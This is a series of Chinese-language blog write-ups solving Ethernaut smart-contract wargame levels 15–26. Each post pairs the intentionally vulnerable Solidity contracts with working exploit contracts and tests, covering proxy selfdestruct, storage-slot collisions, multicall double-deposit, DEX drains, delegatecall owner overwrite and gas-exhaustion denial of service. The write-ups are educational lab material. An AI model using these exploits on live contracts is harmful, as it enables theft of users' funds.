DEV Community: bin2chen

Ethernaut系列-Level 26(DoubleEntryPoint)

bin2chen — Sat, 11 Jun 2022 02:42:57 +0000

LEVEL 26 （DoubleEntryPoint）:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import "@openzeppelin/contracts/access/Ownable.sol";
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";

interface DelegateERC20 {
  function delegateTransfer(address to, uint256 value, address origSender) external returns (bool);
}

interface IDetectionBot {
    function handleTransaction(address user, bytes calldata msgData) external;
}

interface IForta {
    function setDetectionBot(address detectionBotAddress) external;
    function notify(address user, bytes calldata msgData) external;
    function raiseAlert(address user) external;
}

contract Forta is IForta {
  mapping(address => IDetectionBot) public usersDetectionBots;
  mapping(address => uint256) public botRaisedAlerts;

  function setDetectionBot(address detectionBotAddress) external override {
      require(address(usersDetectionBots[msg.sender]) == address(0), "DetectionBot already set");
      usersDetectionBots[msg.sender] = IDetectionBot(detectionBotAddress);
  }

  function notify(address user, bytes calldata msgData) external override {
    if(address(usersDetectionBots[user]) == address(0)) return;
    try usersDetectionBots[user].handleTransaction(user, msgData) {
        return;
    } catch {}
  }

  function raiseAlert(address user) external override {
      if(address(usersDetectionBots[user]) != msg.sender) return;
      botRaisedAlerts[msg.sender] += 1;
  } 
}

contract CryptoVault {
    address public sweptTokensRecipient;
    IERC20 public underlying;

    constructor(address recipient) public {
        sweptTokensRecipient = recipient;
    }

    function setUnderlying(address latestToken) public {
        require(address(underlying) == address(0), "Already set");
        underlying = IERC20(latestToken);
    }

    /*
    ...
    */

    function sweepToken(IERC20 token) public {
        require(token != underlying, "Can't transfer underlying token");
        token.transfer(sweptTokensRecipient, token.balanceOf(address(this)));
    }
}

contract LegacyToken is ERC20("LegacyToken", "LGT"), Ownable {
    DelegateERC20 public delegate;

    function mint(address to, uint256 amount) public onlyOwner {
        _mint(to, amount);
    }

    function delegateToNewContract(DelegateERC20 newContract) public onlyOwner {
        delegate = newContract;
    }

    function transfer(address to, uint256 value) public override returns (bool) {
        if (address(delegate) == address(0)) {
            return super.transfer(to, value);
        } else {
            return delegate.delegateTransfer(to, value, msg.sender);
        }
    }
}

contract DoubleEntryPoint is ERC20("DoubleEntryPointToken", "DET"), DelegateERC20, Ownable {
    address public cryptoVault;
    address public player;
    address public delegatedFrom;
    Forta public forta;

    constructor(address legacyToken, address vaultAddress, address fortaAddress, address playerAddress) public {
        delegatedFrom = legacyToken;
        forta = Forta(fortaAddress);
        player = playerAddress;
        cryptoVault = vaultAddress;
        _mint(cryptoVault, 100 ether);
    }

    modifier onlyDelegateFrom() {
        require(msg.sender == delegatedFrom, "Not legacy contract");
        _;
    }

    modifier fortaNotify() {
        address detectionBot = address(forta.usersDetectionBots(player));

        // Cache old number of bot alerts
        uint256 previousValue = forta.botRaisedAlerts(detectionBot);

        // Notify Forta
        forta.notify(player, msg.data);

        // Continue execution
        _;

        // Check if alarms have been raised
        if(forta.botRaisedAlerts(detectionBot) > previousValue) revert("Alert has been triggered, reverting");
    }

    function delegateTransfer(
        address to,
        uint256 value,
        address origSender
    ) public override onlyDelegateFrom fortaNotify returns (bool) {
        _transfer(origSender, to, value);
        return true;
    }
}

通关要求

防止CryptoVault.sweepToken转走"DoubleEntryPoint" Token

要点

这关是广告。 - -！

解题思路

设置bot判断来源是CryptoVault通知

  function handleTransaction(address user, bytes calldata msgData) external {
    //msgData为DoubleEntryPoint.delegateTransfer(address to,uint256 value,address origSender)的msg.data
    (,,address origSender) = abi.decode(msgData[4:],(address,uint256,address));
    //只过滤不能来自Vault即可，其他正常转
    if (origSender == cryptoVault) {
      IForta(msg.sender).raiseAlert(user);
    }
  }

Ethernaut系列-Level 25(Motorbike)

bin2chen — Fri, 10 Jun 2022 01:24:30 +0000

LEVEL 25 （Motorbike）:

// SPDX-License-Identifier: MIT

pragma solidity <0.7.0;

import "@openzeppelin/contracts/utils/Address.sol";
import "@openzeppelin/contracts/proxy/Initializable.sol";

contract Motorbike {
    // keccak-256 hash of "eip1967.proxy.implementation" subtracted by 1
    bytes32 internal constant _IMPLEMENTATION_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;

    struct AddressSlot {
        address value;
    }

    // Initializes the upgradeable proxy with an initial implementation specified by `_logic`.
    constructor(address _logic) public {
        require(Address.isContract(_logic), "ERC1967: new implementation is not a contract");
        _getAddressSlot(_IMPLEMENTATION_SLOT).value = _logic;
        (bool success,) = _logic.delegatecall(
            abi.encodeWithSignature("initialize()")
        );
        require(success, "Call failed");
    }

    // Delegates the current call to `implementation`.
    function _delegate(address implementation) internal virtual {
        // solhint-disable-next-line no-inline-assembly
        assembly {
            calldatacopy(0, 0, calldatasize())
            let result := delegatecall(gas(), implementation, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            switch result
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }

    // Fallback function that delegates calls to the address returned by `_implementation()`. 
    // Will run if no other function in the contract matches the call data
    fallback () external payable virtual {
        _delegate(_getAddressSlot(_IMPLEMENTATION_SLOT).value);
    }

    // Returns an `AddressSlot` with member `value` located at `slot`.
    function _getAddressSlot(bytes32 slot) internal pure returns (AddressSlot storage r) {
        assembly {
            r_slot := slot
        }
    }
}

contract Engine is Initializable {
    // keccak-256 hash of "eip1967.proxy.implementation" subtracted by 1
    bytes32 internal constant _IMPLEMENTATION_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;

    address public upgrader;
    uint256 public horsePower;

    struct AddressSlot {
        address value;
    }

    function initialize() external initializer {
        horsePower = 1000;
        upgrader = msg.sender;
    }

    // Upgrade the implementation of the proxy to `newImplementation`
    // subsequently execute the function call
    function upgradeToAndCall(address newImplementation, bytes memory data) external payable {
        _authorizeUpgrade();
        _upgradeToAndCall(newImplementation, data);
    }

    // Restrict to upgrader role
    function _authorizeUpgrade() internal view {
        require(msg.sender == upgrader, "Can't upgrade");
    }

    // Perform implementation upgrade with security checks for UUPS proxies, and additional setup call.
    function _upgradeToAndCall(
        address newImplementation,
        bytes memory data
    ) internal {
        // Initial upgrade and setup call
        _setImplementation(newImplementation);
        if (data.length > 0) {
            (bool success,) = newImplementation.delegatecall(data);
            require(success, "Call failed");
        }
    }

    // Stores a new address in the EIP1967 implementation slot.
    function _setImplementation(address newImplementation) private {
        require(Address.isContract(newImplementation), "ERC1967: new implementation is not a contract");

        AddressSlot storage r;
        assembly {
            r_slot := _IMPLEMENTATION_SLOT
        }
        r.value = newImplementation;
    }
}

通关要求

调用Motorbike的Engine里的方法全部失效

要点

1.代理的两种模式，可以参考openzeppelin的文档
https://docs.openzeppelin.com/contracts/4.x/api/proxy#transparent-vs-uups

2.如果proxy的impl实例不存在或摧毁了会导致proxy找不到对应的执行代码
所以impl合约也一定也要保护好，不然会导致proxy功能全失效
史上最大bug奖励就是应该这个
参考：https://medium.com/immunefi/wormhole-uninitialized-proxy-bugfix-review-90250c41a43a

解题思路

找到impl合约的地址，执行impl自己的delegate，插入selfdestruct逻辑

  function run(address _engineAddress) external payable {   
    //impl也是个真实的合约，也可以调用方法，只是用的是自己的storage,如果把impl给摧毁，会导致proxy没有地方执行代码 
    IEngine(_engineAddress).initialize();
    IEngine(_engineAddress).upgradeToAndCall(address(this), abi.encodeWithSignature("destory()"));
  } 

  function destory() external {
    selfdestruct(payable(address(this)));
  }

Ethernaut系列-Level 24(PuzzleProxy)

bin2chen — Thu, 09 Jun 2022 03:19:13 +0000

LEVEL 24 （PuzzleProxy）:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
pragma experimental ABIEncoderV2;

import "@openzeppelin/contracts/math/SafeMath.sol";
import "@openzeppelin/contracts/proxy/UpgradeableProxy.sol";

contract PuzzleProxy is UpgradeableProxy {
    address public pendingAdmin;
    address public admin;

    constructor(address _admin, address _implementation, bytes memory _initData) UpgradeableProxy(_implementation, _initData) public {
        admin = _admin;
    }

    modifier onlyAdmin {
      require(msg.sender == admin, "Caller is not the admin");
      _;
    }

    function proposeNewAdmin(address _newAdmin) external {
        pendingAdmin = _newAdmin;
    }

    function approveNewAdmin(address _expectedAdmin) external onlyAdmin {
        require(pendingAdmin == _expectedAdmin, "Expected new admin by the current admin is not the pending admin");
        admin = pendingAdmin;
    }

    function upgradeTo(address _newImplementation) external onlyAdmin {
        _upgradeTo(_newImplementation);
    }
}

contract PuzzleWallet {
    using SafeMath for uint256;
    address public owner;
    uint256 public maxBalance;
    mapping(address => bool) public whitelisted;
    mapping(address => uint256) public balances;

    function init(uint256 _maxBalance) public {
        require(maxBalance == 0, "Already initialized");
        maxBalance = _maxBalance;
        owner = msg.sender;
    }

    modifier onlyWhitelisted {
        require(whitelisted[msg.sender], "Not whitelisted");
        _;
    }

    function setMaxBalance(uint256 _maxBalance) external onlyWhitelisted {
      require(address(this).balance == 0, "Contract balance is not 0");
      maxBalance = _maxBalance;
    }

    function addToWhitelist(address addr) external {
        require(msg.sender == owner, "Not the owner");
        whitelisted[addr] = true;
    }

    function deposit() external payable onlyWhitelisted {
      require(address(this).balance <= maxBalance, "Max balance reached");
      balances[msg.sender] = balances[msg.sender].add(msg.value);
    }

    function execute(address to, uint256 value, bytes calldata data) external payable onlyWhitelisted {
        require(balances[msg.sender] >= value, "Insufficient balance");
        balances[msg.sender] = balances[msg.sender].sub(value);
        (bool success, ) = to.call{ value: value }(data);
        require(success, "Execution failed");
    }

    function multicall(bytes[] calldata data) external payable onlyWhitelisted {
        bool depositCalled = false;
        for (uint256 i = 0; i < data.length; i++) {
            bytes memory _data = data[i];
            bytes4 selector;
            assembly {
                selector := mload(add(_data, 32))
            }
            if (selector == this.deposit.selector) {
                require(!depositCalled, "Deposit can only be called once");
                // Protect against reusing msg.value
                depositCalled = true;
            }
            (bool success, ) = address(this).delegatecall(data[i]);
            require(success, "Error while delegating call");
        }
    }
}

通关要求

admin = player

要点

delegatecall的storage冲突问题
(前面几关有涉及，参考第6关)
https://dev.to/bin2chen/ethernautxi-lie-level-6delegate-31gk

解题思路

proxy和impl的storage冲突如下:

slot |   proxy        |   impl
----------------------------------
 0   |  pendingAdmin  |   owner
 1   |  admin         |   maxBalance

所以要修改admin可以设置maxBalance，但setMaxBalance需要合约余额为0(合约开始会是0.001 ether)，这样就需要取光合约的余额。
分析下impl的multicall/deposit是有逻辑漏洞，就是可以一次multicall，里包含多个multicall，这些multicall里包含deposit。这样会导致如malticall的mgs.value一次，但会deposit多次，造成一次转账多次使用增加balances

如调用multicall时mgs.value=0.001 ether,传入2个multicall，每个multicall嵌一个deposit，最终balances[msg.sender] = 0.002 ether,但余额只增加0.001 ether
最终变成总合约余额=0.002 ether，我们的balances[player] = 0.002 ether

再执行合约的execute取0.002 ether就可以把余额取光

    function run(address _runAddress) external payable {
      ILevel level = ILevel(_runAddress);
      //proxy和impl的storage位置冲突了，设置pendingAdmin对应的是impl的owner
      level.proposeNewAdmin(address(this));
      level.addToWhitelist(address(this));    
      bytes memory depositData = abi.encodeWithSelector(
                                      bytes4(keccak256("deposit()")));
      bytes memory executeData = abi.encodeWithSelector(
                                      bytes4(keccak256("execute(address,uint256,bytes)")),
                                      address(this),
                                      0.002 ether,
                                      new bytes(0));                                    
      bytes [] memory mutilecallBytes = new bytes[](3); 
      mutilecallBytes[0]=getMuticallData(depositData);
      mutilecallBytes[1]=getMuticallData(depositData);
      mutilecallBytes[2]=getMuticallData(executeData);

      //multicall逻辑漏洞，只验证了同个列表不能有多个deposit，没验证不能multicall，这样可以把deposit放在multicall里
      level.multicall{value:0.001 ether}(mutilecallBytes);
      //proxy和impl的storage位置冲突了，设置maxBalance对应的是proxy的admin
      level.setMaxBalance(uint160(msg.sender));
    }

    function getMuticallData(bytes memory data) private pure returns (bytes memory){
      bytes [] memory mutilecallBytes = new bytes[](1); 
      mutilecallBytes[0]=data;
      bytes memory mutilecallData = abi.encodeWithSelector(
                                      bytes4(keccak256("multicall(bytes[])")),
                                      mutilecallBytes);
      return mutilecallData;
    }

Ethernaut系列-Level 23(DexTwo)

bin2chen — Wed, 08 Jun 2022 01:36:58 +0000

LEVEL 23 （DexTwo）:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import '@openzeppelin/contracts/math/SafeMath.sol';
import '@openzeppelin/contracts/access/Ownable.sol';

contract DexTwo is Ownable {
  using SafeMath for uint;
  address public token1;
  address public token2;
  constructor() public {}

  function setTokens(address _token1, address _token2) public onlyOwner {
    token1 = _token1;
    token2 = _token2;
  }

  function add_liquidity(address token_address, uint amount) public onlyOwner {
    IERC20(token_address).transferFrom(msg.sender, address(this), amount);
  }

  function swap(address from, address to, uint amount) public {
    require(IERC20(from).balanceOf(msg.sender) >= amount, "Not enough to swap");
    uint swapAmount = getSwapAmount(from, to, amount);
    IERC20(from).transferFrom(msg.sender, address(this), amount);
    IERC20(to).approve(address(this), swapAmount);
    IERC20(to).transferFrom(address(this), msg.sender, swapAmount);
  } 

  function getSwapAmount(address from, address to, uint amount) public view returns(uint){
    return((amount * IERC20(to).balanceOf(address(this)))/IERC20(from).balanceOf(address(this)));
  }

  function approve(address spender, uint amount) public {
    SwappableTokenTwo(token1).approve(msg.sender, spender, amount);
    SwappableTokenTwo(token2).approve(msg.sender, spender, amount);
  }

  function balanceOf(address token, address account) public view returns (uint){
    return IERC20(token).balanceOf(account);
  }
}

contract SwappableTokenTwo is ERC20 {
  address private _dex;
  constructor(address dexInstance, string memory name, string memory symbol, uint initialSupply) public ERC20(name, symbol) {
        _mint(msg.sender, initialSupply);
        _dex = dexInstance;
  }

  function approve(address owner, address spender, uint256 amount) public returns(bool){
    require(owner != _dex, "InvalidApprover");
    super._approve(owner, spender, amount);
  }
}

通关要求

token1和token2的余额为0

要点

需要严格检测入参的合法性，所有入参都是不可信的

解题思路

swap方法并没有检查from的合法，可以传任意地址，我们可以传自己的contract，并在被调用的方法balanceOf/transferFrom里面作假

contract DexTwoRun{

  function balanceOf(address) external pure returns (uint){
    return 100;
  }

  function transferFrom(address,address,uint256) public virtual returns (bool) {
    return true;
  }

  function run(address _runAddress,address _token1,address _token2) external {
    //swap没有检测from和to的地址是否合法，所以可以传自己，然后在balanceOf/transferFrom方法里作假
    ILevel(_runAddress).swap(address(this), _token1, 100);    
    ILevel(_runAddress).swap(address(this), _token2, 100);    
  }

}

Ethernaut系列-Level 22(Dex)

bin2chen — Tue, 07 Jun 2022 03:19:15 +0000

LEVEL 22 （Dex）:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import '@openzeppelin/contracts/math/SafeMath.sol';
import '@openzeppelin/contracts/access/Ownable.sol';

contract Dex is Ownable {
  using SafeMath for uint;
  address public token1;
  address public token2;
  constructor() public {}

  function setTokens(address _token1, address _token2) public onlyOwner {
    token1 = _token1;
    token2 = _token2;
  }

  function addLiquidity(address token_address, uint amount) public onlyOwner {
    IERC20(token_address).transferFrom(msg.sender, address(this), amount);
  }

  function swap(address from, address to, uint amount) public {
    require((from == token1 && to == token2) || (from == token2 && to == token1), "Invalid tokens");
    require(IERC20(from).balanceOf(msg.sender) >= amount, "Not enough to swap");
    uint swapAmount = getSwapPrice(from, to, amount);
    IERC20(from).transferFrom(msg.sender, address(this), amount);
    IERC20(to).approve(address(this), swapAmount);
    IERC20(to).transferFrom(address(this), msg.sender, swapAmount);
  }

  function getSwapPrice(address from, address to, uint amount) public view returns(uint){
    return((amount * IERC20(to).balanceOf(address(this)))/IERC20(from).balanceOf(address(this)));
  }

  function approve(address spender, uint amount) public { 
    SwappableToken(token1).approve(msg.sender, spender, amount);
    SwappableToken(token2).approve(msg.sender, spender, amount);
  }

  function balanceOf(address token, address account) public view returns (uint){
    return IERC20(token).balanceOf(account);
  }
}

contract SwappableToken is ERC20 {
  address private _dex;
  constructor(address dexInstance, string memory name, string memory symbol, uint256 initialSupply) public ERC20(name, symbol) {
        _mint(msg.sender, initialSupply);
        _dex = dexInstance;
  }

  function approve(address owner, address spender, uint256 amount) public returns(bool){
    require(owner != _dex, "InvalidApprover");
    super._approve(owner, spender, amount);
  }
}

通关要求

token1或者token2的余额为0

要点

DEX的公式，可以参考uniswap的x*y=k

解题思路

价格公式的问题，只要反复交换，就会越来越多

  function run(address _runAddress,address _token1,address _token2) external {
    uint myToken1Amount;
    uint myToken2Amount;
    uint dexToken1Amount;
    uint dexToken2Amount;
    uint currentSwap = 0;

    while (true) {
      myToken1Amount = IToken(_token1).balanceOf(address(this));
      myToken2Amount = IToken(_token2).balanceOf(address(this));      
      dexToken1Amount = IToken(_token1).balanceOf(_runAddress);
      dexToken2Amount = IToken(_token2).balanceOf(_runAddress);

      //有一个token抽干就退出
      if (dexToken1Amount <= 0 || dexToken2Amount <= 0) {
        break;
      }

      if (myToken1Amount >=myToken2Amount) {
        //根据dex的价格公式，如果需要抽干to,只需from个，所以判断下如果比from大，就用from即可
        currentSwap = myToken1Amount > dexToken1Amount ? dexToken1Amount : myToken1Amount;
        IToken(_token1).approve(_runAddress,currentSwap);
        ILevel(_runAddress).swap(_token1, _token2, currentSwap);       
      } else {        
        currentSwap = myToken2Amount > dexToken2Amount ? dexToken2Amount : myToken2Amount;
        IToken(_token2).approve(_runAddress,currentSwap);
        ILevel(_runAddress).swap(_token2, _token1, currentSwap);
      }            
    }

  }

Ethernaut系列-Level 21(Shop)

bin2chen — Mon, 06 Jun 2022 03:38:28 +0000

LEVEL 21 （Shop）:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

interface Buyer {
  function price() external view returns (uint);
}

contract Shop {
  uint public price = 100;
  bool public isSold;

  function buy() public {
    Buyer _buyer = Buyer(msg.sender);

    if (_buyer.price() >= price && !isSold) {
      isSold = true;
      price = _buyer.price();
    }
  }
}

通关要求

isSold = true
price < 100

要点

view方法的限制,不能修改状态如：storage
https://docs.soliditylang.org/en/v0.8.14/contracts.html?highlight=%20view%20method#view-functions

解题思路

跟11关思路差不多，但增加了view限制，由于不能修改storage，但需要两次返回不一定的结果，这里可以通过gasleft来判断并返回不一样的值，但这里可以使用更简单的方法如调用外部shop.isSold(这个是方法是view,是可以调用的)
如

  function run(address _runAddress) external payable {
    ILevel(_runAddress).buy();
  } 

  function price() external view returns (uint) {
    // view不能写storage，但可以调用外部的view
    // 也可以调用gasleft()来达到两次返回不一样的值，但比较麻烦
    return ILevel(msg.sender).isSold() ? 0 : 100;
  }

Ethernaut系列-Level 20(Denial)

bin2chen — Thu, 02 Jun 2022 06:38:05 +0000

LEVEL 20 （Denial）:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import '@openzeppelin/contracts/math/SafeMath.sol';

contract Denial {

    using SafeMath for uint256;
    address public partner; // withdrawal partner - pay the gas, split the withdraw
    address payable public constant owner = address(0xA9E);
    uint timeLastWithdrawn;
    mapping(address => uint) withdrawPartnerBalances; // keep track of partners balances

    function setWithdrawPartner(address _partner) public {
        partner = _partner;
    }

    // withdraw 1% to recipient and 1% to owner
    function withdraw() public {
        uint amountToSend = address(this).balance.div(100);
        // perform a call without checking return
        // The recipient can revert, the owner will still get their share
        partner.call.value(amountToSend)("");
        owner.transfer(amountToSend);
        // keep track of last withdrawal time
        timeLastWithdrawn = now;
        withdrawPartnerBalances[partner] = withdrawPartnerBalances[partner].add(amountToSend);
    }

    // allow deposit of funds
    receive() external payable {}

    // convenience function
    function contractBalance() public view returns (uint) {
        return address(this).balance;
    }
}

通关要求

阻止withdraw成功转账

要点

调用call方法失败(revert)会返回false

解题思路

call(bytes memory) returns (bool, bytes memory)
如果调用的方法revert是不会中断执行的，方法只会返回false
不过有个例外就是gas耗尽，会中断执行
所以只要在partner的receive方法里耗掉gas即可中断
contracts/20DenialRun.sol

contract DenialRun {
  uint noting;

  receive() external payable {
    while(true){
      noting = 1;
    }
  }

}

Ethernaut系列-Level 19(AlienCodex)

bin2chen — Wed, 01 Jun 2022 02:33:10 +0000

LEVEL 19 （AlienCodex）:

// SPDX-License-Identifier: MIT
pragma solidity ^0.5.0;

import './helpers/Ownable-05.sol';

contract AlienCodex is Ownable {

  bool public contact;
  bytes32[] public codex;

  modifier contacted() {
    assert(contact);
    _;
  }

  function make_contact() public {
    contact = true;
  }

  function record(bytes32 _content) contacted public {
    codex.push(_content);
  }

  function retract() contacted public {
    codex.length--;
  }

  function revise(uint i, bytes32 _content) contacted public {
    codex[i] = _content;
  }
}

通关要求

owner = player

要点

1.storage如何存储
https://docs.soliditylang.org/en/v0.8.14/internals/layout_in_storage.html

2.计算溢出（旧版会溢出，0.8后会异常，这关就不存在了）

解题思路

首先要了解storage里动态数组如何存储

Slot                  Data
------------------------------
0                     owner, contact
1                     codex.length      #p = 1
.
.
keccak256(p)          codex[0]     
keccak256(p) + 1      codex[1]
.
.
keccak256(p) + index  codex[index]
.

contracts/19AlienCodexRun.sol

  function run(address _runAddress,address _playerAddress) external payable {
    ILevel level = ILevel(_runAddress);
    level.make_contact();
    //先回退,0.5版本会溢出，数组长度变很长
    level.retract();
    bytes32 arrSlot = keccak256(abi.encodePacked(uint256(1)));    
    uint256 gap = (type(uint256).max - uint256(arrSlot)) + 1;
    //传入GAP会导致arrSlot+gag溢出后=0，即设置slot:0,这个位置用于存owner和bool contact
    level.revise(gap, bytes32(uint256(uint160(_playerAddress))));
  }

Ethernaut系列-Level 18(MagicNum)

bin2chen — Tue, 31 May 2022 07:23:00 +0000

LEVEL 18 （MagicNum）:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract MagicNum {

  address public solver;

  constructor() public {}

  function setSolver(address _solver) public {
    solver = _solver;
  }

  /*
    ____________/\\\_______/\\\\\\\\\_____        
     __________/\\\\\_____/\\\///////\\\___       
      ________/\\\/\\\____\///______\//\\\__      
       ______/\\\/\/\\\______________/\\\/___     
        ____/\\\/__\/\\\___________/\\\//_____    
         __/\\\\\\\\\\\\\\\\_____/\\\//________   
          _\///////////\\\//____/\\\/___________  
           ___________\/\\\_____/\\\\\\\\\\\\\\\_ 
            ___________\///_____\///////////////__
  */
}

通关要求

写个合约，设置为solver
合约要求：
1.调用合约的whatIsTheMeaningOfLife()方法返回一个代表生命意思的答案（科幻梗数字42）
2.合约的字节码要足够小，extcodesize <=10

要点

1.了解yul编码(或以太坊的opcodes)
https://docs.soliditylang.org/en/v0.8.14/yul.html

解题思路

由于需要考虑到合约的大小，所以不能用solidity来编写
可以使用yul来编写，参考官方文档的例子
https://docs.soliditylang.org/en/v0.8.14/yul.html
新建18MagicNum.yul

object "magic42" {
    code {
        //部署
        datacopy(0, dataoffset("runtime"), datasize("runtime"))
        return(0, datasize("runtime"))
    }
    object "runtime" {
        code {
            mstore(0, 0x2a)  //设置mem[0..32]=0x2a
            return(0, 0x20)  //返回mem[0..32]
        }
    }
}

然后用命令编译：
solc --strict-assembly --optimize contracts/18MagicNum.yul
得到

Binary representation:
600a80600c6000396000f3fe602a60005260206000f3

如果使用在线的remix,也可以在线用yul编译,再复制Bytecode->object
如图：

这串是合约部署bytecode，实际部署完会更小
线上过关可以在chrome控制台执行

bytecode = '600a80600c6000396000f3fe602a60005260206000f3'
txn = await web3.eth.sendTransaction({from: player, data: bytecode})
await contract.setSolver(txn.contractAddress)

hardhat里
contracts/18MagicNumRun.sol

  function check(address _runAddress,uint codeszie) external payable {
    require(ILevel(_runAddress).whatIsTheMeaningOfLife() == 42, "not equal 42");

    uint256 size;
    assembly {
      size := extcodesize(_runAddress)
    }

    require(size <= codeszie,"bigger codeszie ");
  }

test/18MagicNum.js

describe("18MagicNumb", function () {
  let player, levelOwner, levelContract, runContract;
  it("setup", async function () {
    [player, levelOwner] = await ethers.getSigners();
    const interface = ["function whatIsTheMeaningOfLife() returns (uint)"];
    //使用：得到这个solc --strict-assembly --optimize contracts/18MagicNumber.yul
    //也可以使用remix在线编译，再复制Bytecode
    const bytecode = "600a80600c6000396000f3fe602a60005260206000f3";
    const Contract = new ethers.ContractFactory(
      interface,
      bytecode,
      levelOwner
    );
    levelContract = await Contract.deploy();
    await levelContract.deployed();

    runContract = await tools.deployContract("MagicNumRun", player);
  });

  it("attacks", async function () {});

  it("check", async function () {
    //检查通过条件
    await runContract.check(levelContract.address, 10);
  });
});

Ethernaut系列-Level 17(Recovery)

bin2chen — Mon, 30 May 2022 01:20:05 +0000

LEVEL 17 （Recovery）:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import '@openzeppelin/contracts/math/SafeMath.sol';

contract Recovery {

  //generate tokens
  function generateToken(string memory _name, uint256 _initialSupply) public {
    new SimpleToken(_name, msg.sender, _initialSupply);

  }
}

contract SimpleToken {

  using SafeMath for uint256;
  // public variables
  string public name;
  mapping (address => uint) public balances;

  // constructor
  constructor(string memory _name, address _creator, uint256 _initialSupply) public {
    name = _name;
    balances[_creator] = _initialSupply;
  }

  // collect ether in return for tokens
  receive() external payable {
    balances[msg.sender] = msg.value.mul(10);
  }

  // allow transfers of tokens
  function transfer(address _to, uint _amount) public { 
    require(balances[msg.sender] >= _amount);
    balances[msg.sender] = balances[msg.sender].sub(_amount);
    balances[_to] = _amount;
  }

  // clean up after ourselves
  function destroy(address payable _to) public {
    selfdestruct(_to);
  }
}

通关要求

找到token的地址，并取回0.001ETH

要点

1.熟悉https://rinkeby.etherscan.io/
2.selfdestruct的作用

解题思路

区块链的事务都有记录在链上，通过相应的工具都可以查看如etherscan.io
通过instance的地址，在网站上找到对应的内部事务(创建合约和转账0.001ETH的地址)，就是那个合约地址，然后调用这个地址的destroy

  it("attacks", async function () {
    //真实的SimpleToken地址可以通过https://rinkeby.etherscan.io/
    //查询对应的instance的事务里面的创建合同，并往哪个地址转了0.001ETH，就是那个合同地址
    const tokenAddress = levelContract.address;
    const contract = await ethers.getContractAt("SimpleToken", tokenAddress);
    await contract.connect(levelOwner).destroy(player.address);
  });

Ethernaut系列-Level 16(Preservation)

bin2chen — Sat, 28 May 2022 01:33:04 +0000

LEVEL 16 （Preservation）:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Preservation {

  // public library contracts 
  address public timeZone1Library;
  address public timeZone2Library;
  address public owner; 
  uint storedTime;
  // Sets the function signature for delegatecall
  bytes4 constant setTimeSignature = bytes4(keccak256("setTime(uint256)"));

  constructor(address _timeZone1LibraryAddress, address _timeZone2LibraryAddress) public {
    timeZone1Library = _timeZone1LibraryAddress; 
    timeZone2Library = _timeZone2LibraryAddress; 
    owner = msg.sender;
  }

  // set the time for timezone 1
  function setFirstTime(uint _timeStamp) public {
    timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
  }

  // set the time for timezone 2
  function setSecondTime(uint _timeStamp) public {
    timeZone2Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
  }
}

// Simple library contract to set the time
contract LibraryContract {

  // stores a timestamp 
  uint storedTime;  

  function setTime(uint _time) public {
    storedTime = _time;
  }
}

通关要求

owner=player

要点

1.理解delegatecall如何处理storage
第6关有类似
https://dev.to/bin2chen/ethernautxi-lie-level-6delegate-31gk

2.storage的位置如何存储

解题思路

调用delegatecall代码使用被调合约的代码，但storage使用是调用方的storage
所以第一次调用setFirstTime时，LibraryContract里的storedTime(slot:0)对应的是Preservation的timeZone1Library(slot:0)的位置,所以timeZone1Library会被入参time给覆盖，这样可以传time为我们指定一个外包合约地址，第二次再调用setFirstTime就会调用这个外部合约，然后在通过这个外部合约写入owner(slot:2)即可改下owner

contract PreservationRun {
  address public timeZone1Library;
  address public timeZone2Library;
  address public owner; 

  function setTime(uint256 _time) public {
    owner = address(uint160(_time));
  }
  function run(address _runAddress, address _playerAddress) external payable {
    //调用第一次setFirstTime后，会覆盖Preservation.sol的timeZone1Library为本合约
    ILevel(_runAddress).setFirstTime(uint160(address(this)));

    //第二次时间是调用这个合约的setTime,但storage用的是Preservation.sol的storage的slot:3即owner
    ILevel(_runAddress).setFirstTime(uint160(_playerAddress));
  }  
}

Ethernaut系列-Level 15(NaughtCoin)

bin2chen — Fri, 27 May 2022 03:10:07 +0000

LEVEL 15 （NaughtCoin）:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import '@openzeppelin/contracts/token/ERC20/ERC20.sol';

 contract NaughtCoin is ERC20 {

  // string public constant name = 'NaughtCoin';
  // string public constant symbol = '0x0';
  // uint public constant decimals = 18;
  uint public timeLock = now + 10 * 365 days;
  uint256 public INITIAL_SUPPLY;
  address public player;

  constructor(address _player) 
  ERC20('NaughtCoin', '0x0')
  public {
    player = _player;
    INITIAL_SUPPLY = 1000000 * (10**uint256(decimals()));
    // _totalSupply = INITIAL_SUPPLY;
    // _balances[player] = INITIAL_SUPPLY;
    _mint(player, INITIAL_SUPPLY);
    emit Transfer(address(0), player, INITIAL_SUPPLY);
  }

  function transfer(address _to, uint256 _value) override public lockTokens returns(bool) {
    super.transfer(_to, _value);
  }

  // Prevent the initial owner from transferring tokens until the timelock has passed
  modifier lockTokens() {
    if (msg.sender == player) {
      require(now > timeLock);
      _;
    } else {
     _;
    }
  } 
}

通关要求

player的token余额=0

要点

理解ERC20标准

解题思路

ERC20除了直接transfer还可以通过approve/transferFrom进行转token

  it("attacks", async function () {
    let playerBalance = await levelContract.balanceOf(player.address);
    let otherUser = (await ethers.getSigners())[5];
    await levelContract
      .connect(player)
      .approve(otherUser.address, playerBalance);
    await levelContract
      .connect(otherUser)
      .transferFrom(player.address, otherUser.address, playerBalance);
  });